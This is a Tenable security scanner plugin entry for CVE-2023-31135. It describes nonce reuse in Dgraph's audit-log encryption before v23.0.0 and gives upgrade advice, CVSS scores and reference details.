SCA: security update for github.com/dgraph-io/dgraph (GHSA-92wq-q9pq-gw47)

medium Tenable Cloud Security Plugin ID 412973

Description

There are packages installed that are affected by a vulnerability referenced in the following CVE:

- Dgraph is an open source distributed GraphQL database. Existing Dgraph audit logs are vulnerable to brute
force attacks due to nonce collisions. The first 12 bytes come from a baseIv which is initialized when an
audit log is created. The last 4 bytes come from the length of the log line being encrypted. This is
problematic because two log lines will often have the same length, so due to these collisions we are
reusing the same nonce many times. All audit logs generated by versions of Dgraph <v23.0.0 are affected.
Attackers must have access to the system the logs are stored on. Dgraph users should upgrade to v23.0.0.
Users unable to upgrade should store existing audit logs in a secure location and for extra security,
encrypt using an external tool like `gpg`. (CVE-2023-31135)

See Also

https://github.com/advisories/GHSA-92wq-q9pq-gw47

Plugin Details

Severity: Medium

ID: 412973

Version: Revision 1.4

Type: Local

Family: SCA Checks

Published: 1/23/2025

Updated: 8/20/2025

Supported Sensors: Tenable Cloud Security, Tenable Self-Hosted Container Security

Risk Information

VPR

Risk Factor: Low

Score: 3

Percentile: 23.51

Vendor

Vendor Severity: Medium

CVSS v2

Risk Factor: Medium

Base Score: 4.6

Temporal Score: 3.4

Vector: CVSS2#AV:L/AC:L/Au:S/C:C/I:N/A:N

CVSS Score Source: CVE-2023-31135

CVSS v3

Risk Factor: Medium

Base Score: 5.5

Temporal Score: 4.8

Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Temporal Vector: CVSS:3.0/E:U/RL:O/RC:C

Vulnerability Information

Exploit Ease: No known exploits are available

Patch Publication Date: 5/17/2023

Vulnerability Publication Date: 5/17/2023

Reference Information

CVE: CVE-2023-31135

cwe: CWE-326